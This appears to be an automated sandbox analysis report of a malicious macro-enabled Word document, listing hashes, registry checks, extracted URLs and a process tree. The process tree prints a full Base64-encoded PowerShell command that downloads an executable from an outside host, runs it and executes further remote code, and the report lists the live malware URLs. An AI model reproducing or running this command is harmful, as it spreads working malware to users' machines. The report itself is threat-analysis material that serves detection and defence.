Analysis
-
max time kernel
136s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
07-05-2024 00:45
Behavioral task
behavioral1
Sample
1ee0336e030dc9d11b09d43f33cdb9ed_JaffaCakes118.docm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
1ee0336e030dc9d11b09d43f33cdb9ed_JaffaCakes118.docm
Resource
win10v2004-20240419-en
General
-
Target
1ee0336e030dc9d11b09d43f33cdb9ed_JaffaCakes118.docm
-
Size
66KB
-
MD5
1ee0336e030dc9d11b09d43f33cdb9ed
-
SHA1
cf76616a5b3a58055407d69df9e2ebbba460ed48
-
SHA256
ff10e852973c6675fa1f623eb27ff70306ba607a25c976d78d9396731205ec0e
-
SHA512
78bf7942ad153c2e0c02add27d3b5a8af2385831893a20a8f8a20ab584f71ad88bf172cf4e9c76df928f1c31603c2cbf928ff7a5f547996efba1b5c0a43ecfe9
-
SSDEEP
1536:Az0Cye/Y8HvkktFDyL7PaSHCRM7PaqgZ3j2ksHLfxd:a0Cy6Y8sDXySHFjaTZzG
Malware Config
Extracted
http://anymonbunrybgakbweew.com/s.php?id=dogc
http://cnhoteltex.com/Stat.count
http://anymonbunrybgakbweew.com/SS/dogc.tzm
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3796 4944 powershell.exe 83 -
Blocklisted process makes network request 2 IoCs
flow pid Process 124 3796 powershell.exe 125 3796 powershell.exe -
pid Process 3796 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3636 WINWORD.EXE 3636 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3796 powershell.exe 3796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3796 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3636 WINWORD.EXE 3636 WINWORD.EXE 3636 WINWORD.EXE 3636 WINWORD.EXE 3636 WINWORD.EXE 3636 WINWORD.EXE 3636 WINWORD.EXE 3636 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1ee0336e030dc9d11b09d43f33cdb9ed_JaffaCakes118.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3636
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoExit -Exec Bypass -EC IAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGEAbgB5AG0AbwBuAGIAdQBuAHIAeQBiAGcAYQBrAGIAdwBlAGUAdwAuAGMAbwBtAC8AUwBTAC8AZABvAGcAYwAuAHQAegBtACcALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXABjAGUANgBhAGIAYQBlADAALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAnAFwAYwBlADYAYQBiAGEAZQAwAC4AZQB4AGUAJwA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYQBuAHkAbQBvAG4AYgB1AG4AcgB5AGIAZwBhAGsAYgB3AGUAZQB3AC4AYwBvAG0ALwBzAC4AcABoAHAAPwBpAGQAPQBkAG8AZwBjACcAKQA7ACAASQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAG4AaABvAHQAZQBsAHQAZQB4AC4AYwBvAG0ALwBTAHQAYQB0AC4AYwBvAHUAbgB0ACcAKQApADsA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3796
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82